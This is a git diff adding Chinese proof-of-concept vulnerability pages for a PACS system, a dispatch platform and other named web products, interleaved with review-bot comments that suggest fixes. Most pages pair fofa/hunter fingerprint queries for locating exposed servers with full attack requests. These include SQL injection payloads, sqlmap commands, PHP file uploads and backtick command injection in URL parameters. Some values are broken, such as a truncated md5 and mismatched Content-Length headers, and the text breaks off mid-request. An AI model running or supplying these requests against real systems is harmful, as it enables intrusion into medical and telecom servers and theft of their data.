+![1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6.png](./img/0-avbnMa_PzLrg3f/1700650941861-e1d2149c-0043-4e5b-8d5a-a051c63982a6-854837.png) + +# 四、漏洞复现 +```plain +/JcbgForYsz/Show_Jcbg_Ysz.asp +``` + +![1700651024018-1df5dcd8-f8c7-4a87-b1f4-07ccd9574c98.png](./img/0-avbnMa_PzLrg3f/1700651024018-1df5dcd8-f8c7-4a87-b1f4-07ccd9574c98-791553.png) + + + +> 更新: 2024-02-29 23:55:28 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qh4xl88f5hzvc3bi> \ No newline at end of file 
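Review bot: 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在信息泄露漏洞.md says enumerating `dabh` returns patient records, which is an IDOR on `XTWebPacsGetJcbgByDabh.asp`, and the URL is identical to the dabh SQL injection page; the two should cross-reference each other. Add the mitigation (authenticate the endpoint, check that the requested 档案号 belongs to the caller, use non-sequential identifiers) and note for defenders that sequential `dabh` values from one client in the access log are the signature of this exposure.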
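Review bot: 成都信通网易医疗科技发展有限公司PACS(医学影像信息管理系统)存在未授权访问漏洞.md gives only the path `/JcbgForYsz/Show_Jcbg_Ysz.asp` and a screenshot; state what the page exposes without a session (per the XSS page, the 查询 form and report results) so the claim is verifiable from text. Together with the edtJclx and XSS pages this is the third entry on the same endpoint; one page with the three issues and a single remediation section (require login, parameterise the query, encode output) would be clearer.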
diff --git a/成都海翔软件有限公司海翔药业云平台存在sql注入.md b/成都海翔软件有限公司海翔药业云平台存在sql注入.md new file mode 100644 index 0000000..c68a91c --- /dev/null +++ b/成都海翔软件有限公司海翔药业云平台存在sql注入.md @@ -0,0 +1,47 @@ +# 成都海翔软件有限公司海翔药业云平台存在 sql 注入 + +# 一、漏洞简介 +成都海翔软件有限公司海翔药业云平台存在 sql 注入 + +# 二 、影响版本 ++ 海翔药业云平台 + +# 三、资产测绘 ++ hunter`web.title="登录海翔"` ++ 特征 + +![1699025804921-a9adab4f-2528-45d0-8719-7d93e41f497d.png](./img/Ae4tpd8OCz3U9rwy/1699025804921-a9adab4f-2528-45d0-8719-7d93e41f497d-192125.png) + +# 四、漏洞复现 +漏洞位置,搜索账套处 + +![1699025926526-01196046-54a6-4f7e-8f35-13d9b5990117.png](./img/Ae4tpd8OCz3U9rwy/1699025926526-01196046-54a6-4f7e-8f35-13d9b5990117-268568.png) + +```plain +POST /getylist_login.do HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 13 +Connection: close +Cookie: JSESSIONID=CC105C5EED7D5DE8BFCB92D7F4BB74DC; __session:0.5376174871119012:=http: + +accountname=1 +``` + +sqlmap + +```plain +sqlmap -r 1.txt --skip-waf --batch +``` + +![1699025944666-82311c81-9823-4e94-997d-0d8ba7c32ca1.png](./img/Ae4tpd8OCz3U9rwy/1699025944666-82311c81-9823-4e94-997d-0d8ba7c32ca1-162460.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bn1l8e2pqvvd28hg> \ No newline at end of file diff --git a/手机卡号推广商城ssk存在SQL注入漏洞.md b/手机卡号推广商城ssk存在SQL注入漏洞.md new file mode 100644 index 0000000..f404f49 --- /dev/null +++ b/手机卡号推广商城ssk存在SQL注入漏洞.md 
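Review bot: 漏洞简介 in 成都海翔软件有限公司海翔药业云平台存在sql注入.md just repeats the title; name the injectable parameter (`accountname` of `/getylist_login.do`) and the impact. The request body `accountname=1` is benign, so the only evidence is the sqlmap screenshot; describe the observed behaviour or give a minimal indicator. The `Cookie:` line contains a malformed `__session:0.5376174871119012:=http:` fragment and a real `JSESSIONID`; strip it. The heading "二 、影响版本" has a stray space, and no fix is given.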
@@ -0,0 +1,59 @@ +# 手机卡号推广商城ssk存在SQL注入漏洞 + +# 一、漏洞简介 + 手机卡号推广商城是一个在线平台,提供手机卡号销售、号码推广、套餐介绍、安全保障和售后服务等功能,满足用户对手机卡号的需求,为用户提供便利的服务体验。 手机卡号推广商城 login.php接口处存在 SQL 注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 + +# 二、影响版本 ++ 手机卡号推广商城 + +# 三、资产测绘 ++ fofa`body="zgdx.php"` ++ 特征 + +![1715176303991-c852989c-d754-4c4a-8f26-6bde61362c67.png](./img/TZ56b5Nh8Wr31Cat/1715176303991-c852989c-d754-4c4a-8f26-6bde61362c67-390785.png) + + 手机卡号推广商城是一个在线平台,提供手机卡号销售、号码推广、套餐介绍、安全保障和售后服务等功能,满足用户对手机卡号的需求,为用户提供便利的服务体验。 + +# 四、漏洞复现 +```http +POST /ssk/login.php HTTP/1.1 +Host: +Content-Length: 199 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +username=' OR (SELECT 5126 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(5126=5126,1))),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tyft&password=123123 +``` + +![1715178848654-441442f8-e1fe-4d1a-bf55-eb7b8fd2aac6.png](./img/TZ56b5Nh8Wr31Cat/1715178848654-441442f8-e1fe-4d1a-bf55-eb7b8fd2aac6-592450.png) + +```http +qjjjq1qxkzq1 +``` + +sqlmap + +```http +POST /ssk/login.php HTTP/1.1 +Host: +Content-Length: 199 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +username=&password=123123 +``` + 
+![1715178886524-70e83ac2-67e8-47a8-a53e-99049d34e5c4.png](./img/TZ56b5Nh8Wr31Cat/1715178886524-70e83ac2-67e8-47a8-a53e-99049d34e5c4-472915.png) + + + +> 更新: 2024-05-09 11:09:15 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xwfc57fpx7o7dqr8> \ No newline at end of file diff --git a/挂号系统login.php存在SQL注入漏洞.md b/挂号系统login.php存在SQL注入漏洞.md new file mode 100644 index 0000000..be8ae2e --- /dev/null +++ b/挂号系统login.php存在SQL注入漏洞.md @@ -0,0 +1,31 @@ +# 挂号系统login.php存在SQL注入漏洞 + +# 一、漏洞简介 +挂号系统存在SQL注入,可能导致数据库信息泄露、恶意数据库操作 + +# 二、资产测绘 +```plain +body="res/img/ht_box_back.gif" || body="/res/img/ht_box_top.gif" || body="/res/img/ht_box_bottom.gif" || body="dom_loaded.load(init);" +``` + +![1715188160121-e62854f9-b160-425b-821a-fd1b5485ce71.png](./img/F-XmhV62ILsZoyLF/1715188160121-e62854f9-b160-425b-821a-fd1b5485ce71-639679.png) + +## 三、漏洞复现 +```http +POST /m/login.php?op=login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 +Content-Type: application/x-www-form-urlencoded +x-forwarded-for: 127.0.0.1 'and exists(select * from mysql)-- 123 + +username=admin&password=admin&vcode=4997&to=&vcode_hash=03b498138c14b2d0515b5438808d6604 +``` + +![1715224720711-eda57077-d9d0-466c-92d0-c91de443dbc9.png](./img/F-XmhV62ILsZoyLF/1715224720711-eda57077-d9d0-466c-92d0-c91de443dbc9-087014.png) + +**<font style="color:#DF2A3F;">注入为insert类型,请勿使用sqlmap</font>** + + + +> 更新: 2024-05-09 11:20:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yfrf96eoc8tgqfau> \ No newline at end of file diff --git a/指挥调度平台ajax_users存在SQL注入漏洞.md b/指挥调度平台ajax_users存在SQL注入漏洞.md new file mode 100644 index 0000000..84e6dbd --- /dev/null +++ b/指挥调度平台ajax_users存在SQL注入漏洞.md 
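Review bot: In 手机卡号推广商城ssk存在SQL注入漏洞.md the 漏洞简介 paragraph is pasted a second time under 资产测绘 after the screenshot; remove the duplicate. The second request (under "sqlmap") keeps `Content-Length: 199` for the 25-byte body `username=&password=123123`, and the section titled sqlmap contains no sqlmap command (other pages use `sqlmap -r 1.txt`). The `qjjjq1qxkzq1` block fenced as ```http is the expected error-based marker (the hex prefixes `0x716a6a6a71` and `0x71786b7a71` decode to `qjjjq` and `qxkzq`); label it as the expected response fragment rather than leaving a bare code block, and add the fix (bind `username` in the `login.php` query).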
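Review bot: 挂号系统login.php存在SQL注入漏洞.md uses `## 三、漏洞复现` while its other headings are level 1, and has no 影响版本 section. The injection is in the `x-forwarded-for` header (`'and exists(select * from mysql)-- 123`), not in the body parameters, which the page should spell out; the red note that it is an insert-type injection implies the client IP is written to a login log without binding, and that is the fix to recommend (bind the value, or validate it as an IP address before the insert). The `vcode=4997` and `vcode_hash=...` pair appears to be a captcha value tied to the captured session; the reproduction steps should say whether it has to be refreshed.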
@@ -0,0 +1,36 @@ +# 指挥调度平台ajax_users存在SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台ajax_users存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/bIUf__mIbiystGtX/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-579205.png) + +# 四、漏洞复现 +```http +POST /app/ext/ajax_users.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL-- - +``` + +![1715267670568-c3055dcd-a14d-4de9-bdf2-231701685779.png](./img/bIUf__mIbiystGtX/1715267670568-c3055dcd-a14d-4de9-bdf2-231701685779-804715.png) + +```http +e10adc3949ba59abbe56e057f20f883 +``` + + + + + +> 更新: 2024-05-10 15:30:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qmfywxxk17pr7xs3> \ No newline at end of file diff --git a/指挥调度平台client_upload存在任意文件上传漏洞.md b/指挥调度平台client_upload存在任意文件上传漏洞.md new file mode 100644 index 0000000..7e24623 --- /dev/null +++ b/指挥调度平台client_upload存在任意文件上传漏洞.md 
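Review bot: The expected-output block `e10adc3949ba59abbe56e057f20f883` in 指挥调度平台ajax_users存在SQL注入漏洞.md is 31 characters; md5(123456) is `e10adc3949ba59abbe56e057f20f883e`, so the trailing `e` was lost. The page should also state that `dep_level` is the injectable parameter of `/app/ext/ajax_users.php` and that the five-column UNION is what the screenshot confirms, and it gives no fix (parameterise the department query). Minor: the POST has no `Content-Length` header.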
@@ -0,0 +1,50 @@ +# 指挥调度平台client_upload存在任意文件上传漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台client_upload存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/4sD9krRQUS7aBGa8/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-720140.png) + +# 四、漏洞复现 +```plain +POST /api/client/upload.php HTTP/1.1 +Host: {hostname} +Content-Length: 180 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundarySwvD8hSn3Z0sHfMu +Content-Disposition: form-data; name="ulfile";filename="1.php" +Content-Type: image/png + +<?php echo 111*111;?> +------WebKitFormBoundarySwvD8hSn3Z0sHfMu-- +``` + +![1704270269821-29e1c7ea-5a61-4f0e-a068-e4414af808be.png](./img/4sD9krRQUS7aBGa8/1704270269821-29e1c7ea-5a61-4f0e-a068-e4414af808be-125035.png) + +上传文件位置 + +```plain +/upload/1.php +``` + +![1704270300936-e64326f0-0b9a-45c3-b5b2-a93fea878bcc.png](./img/4sD9krRQUS7aBGa8/1704270300936-e64326f0-0b9a-45c3-b5b2-a93fea878bcc-849516.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cqbzid7u7knls8bl> \ No newline at end of file diff --git a/指挥调度平台event_uploadfile存在任意文件上传漏洞.md b/指挥调度平台event_uploadfile存在任意文件上传漏洞.md new file mode 100644 index 0000000..ff6607f --- /dev/null +++ b/指挥调度平台event_uploadfile存在任意文件上传漏洞.md 
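Review bot: In 指挥调度平台client_upload存在任意文件上传漏洞.md the uploaded file keeps its client-supplied name (`/upload/1.php`), unlike the event_uploadfile page where the server renames to a UUID; that client-controlled filename and extension under the web root is the core of this bug and should be stated together with the fix (server-side extension allow-list, random names, non-executable upload directory). `Host: {hostname}` differs from the `xx.xx.xx.xx` placeholder used elsewhere, `Content-Length: 180` does not appear to match the multipart body shown, and 漏洞简介 has the typo 指挥调度喝管理 (喝 should be 和).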
@@ -0,0 +1,47 @@ +# 指挥调度平台event_uploadfile存在任意文件上传漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台event_uploadfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/ojv9dkJApB3BJyaT/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-308583.png) + +# 四、漏洞复现 +```plain +POST /api/client/event/uploadfile.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 +Connection: close +Content-Length: 179 +Content-Type: multipart/form-data; boundary=htu3qcyui73l2jtyqwnk +Accept-Encoding: gzip, deflate + +--htu3qcyui73l2jtyqwnk +Content-Disposition: form-data; name="uploadfile"; filename="stc.php" +Content-Type: image/jpeg + +<?php echo 111*111;?> +--htu3qcyui73l2jtyqwnk-- + +``` + +![1701096805339-6c486035-e40d-4fa4-a928-29e83b27b7b7.png](./img/ojv9dkJApB3BJyaT/1701096805339-6c486035-e40d-4fa4-a928-29e83b27b7b7-231504.png) + +上传文件位置 + +```plain +/upload/event/ccc78e2b-5e61-49c0-9050-3a29687b2e81.php +``` + +![1701096849479-93ad2b75-2bba-47cd-a3eb-30b49de88bb3.png](./img/ojv9dkJApB3BJyaT/1701096849479-93ad2b75-2bba-47cd-a3eb-30b49de88bb3-235066.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/llu0mvvzuhvpu9ag> \ No newline at end of file diff --git a/指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md b/指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md new file mode 100644 index 0000000..5c5de4d --- /dev/null +++ b/指挥调度平台get_gis_fence_warning存在SQL注入漏洞.md 
@@ -0,0 +1,63 @@ +# 指挥调度平台get_gis_fence_warning存在SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。</font>指挥调度平台get_gis_fence_warning存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 指挥调度平台 + +# 三、资产测绘 ++ hunter`web.body="app/structure/departments.php"` ++ 特征 + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/BGHJmd0Vs536cinb/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-858315.png) + +# 四、漏洞复现 +```plain +POST /api/client/get_gis_fence_warning.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=7d1e1db182a16e0508fda0961e9a0f6d +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 138 + +usernumber=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707a71,IFNULL(CAST(111*111 AS CHAR),0x20),0x7162707671),NULL,NULL,NULL,NULL,NULL-- - +``` + +![1705368432160-49c93ef1-c200-4953-984d-7ebffe2c4705.png](./img/BGHJmd0Vs536cinb/1705368432160-49c93ef1-c200-4953-984d-7ebffe2c4705-770391.png) + +```plain +qbpzq12321qbpvq +``` + +sqlmap + +```plain +POST /api/client/get_gis_fence_warning.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=7d1e1db182a16e0508fda0961e9a0f6d +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 138 + 
+usernumber=1 +``` + +![1705368573688-a697002f-062d-4ea4-88d1-c7e68407ba75.png](./img/BGHJmd0Vs536cinb/1705368573688-a697002f-062d-4ea4-88d1-c7e68407ba75-867695.png) + +[福建科立讯通信-指挥调度平台-get-gis-fence-warning-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222143857-625cde56-ac55-4d9f-83ab-c5df6957533e.yaml) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/arehbbh2c0r4whc1> \ No newline at end of file diff --git a/指挥调度平台invite2videoconf存在远程命令执行漏洞.md b/指挥调度平台invite2videoconf存在远程命令执行漏洞.md new file mode 100644 index 0000000..e05b839 --- /dev/null +++ b/指挥调度平台invite2videoconf存在远程命令执行漏洞.md 
@@ -0,0 +1,46 @@ +# 指挥调度平台invite2videoconf存在远程命令执行漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台invite2videoconf存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>` ++ <font style="color:rgb(51, 51, 51);">特征</font> + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/9I-6Dftk3FzJMfK0/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-374335.png) + +# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font> +```plain +GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + +![1704269810485-436485d3-d594-4d97-a153-bbbe5e015577.png](./img/9I-6Dftk3FzJMfK0/1704269810485-436485d3-d594-4d97-a153-bbbe5e015577-982852.png) + +获取命令执行结果 + +```plain +GET /api/client/1.txt HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + 
+![1704269858932-57965ade-866e-41f8-850f-7f9cbbbc6662.png](./img/9I-6Dftk3FzJMfK0/1704269858932-57965ade-866e-41f8-850f-7f9cbbbc6662-188253.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kasf0a92raukvgf5> \ No newline at end of file diff --git a/指挥调度平台invite_one_member存在远程命令执行漏洞.md b/指挥调度平台invite_one_member存在远程命令执行漏洞.md new file mode 100644 index 0000000..4a8f888 --- /dev/null +++ b/指挥调度平台invite_one_member存在远程命令执行漏洞.md 
@@ -0,0 +1,46 @@ +# 指挥调度平台invite_one_member存在远程命令执行漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台invite_one_member存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>` ++ <font style="color:rgb(51, 51, 51);">特征</font> + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/HiSRlR6oYxF5SC60/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-490622.png) + +# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font> +```plain +GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + +![1704269514170-dd697dbd-3d30-4627-b5a8-7c8c9311b12f.png](./img/HiSRlR6oYxF5SC60/1704269514170-dd697dbd-3d30-4627-b5a8-7c8c9311b12f-410619.png) + +获取命令执行结果 + +```plain +GET /api/client/audiobroadcast/1.txt HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + 
+![1704269557671-017c3bf2-7d59-4077-9366-383b169516b1.png](./img/HiSRlR6oYxF5SC60/1704269557671-017c3bf2-7d59-4077-9366-383b169516b1-896745.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qrlgzdlrg8kwz94r> \ No newline at end of file diff --git a/指挥调度平台invite_one_ptter存在远程命令执行漏洞.md b/指挥调度平台invite_one_ptter存在远程命令执行漏洞.md new file mode 100644 index 0000000..d2c4b08 --- /dev/null +++ b/指挥调度平台invite_one_ptter存在远程命令执行漏洞.md 
@@ -0,0 +1,46 @@ +# 指挥调度平台invite_one_ptter存在远程命令执行漏洞 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台invite_one_ptter存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。</font> + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ <font style="color:rgb(51, 51, 51);">hunter</font>`<font style="color:rgb(51, 51, 51);">web.body="app/structure/departments.php"</font>` ++ <font style="color:rgb(51, 51, 51);">特征</font> + +![1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74.png](./img/FQYE9MXMbjGWC4jB/1701096622884-9c34ec74-7f59-464c-b435-5a6ccd465c74-474502.png) + +# <font style="color:rgb(51, 51, 51);">四、漏洞复现</font> +```plain +GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 +Upgrade-Insecure-Requests: 1 +``` + +![1704270029047-d62fbfb3-e35a-4ea6-8371-a21c9bd7bb14.png](./img/FQYE9MXMbjGWC4jB/1704270029047-d62fbfb3-e35a-4ea6-8371-a21c9bd7bb14-708883.png) + +获取命令执行结果 + +```plain +GET /api/client/ptt/1.txt HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: 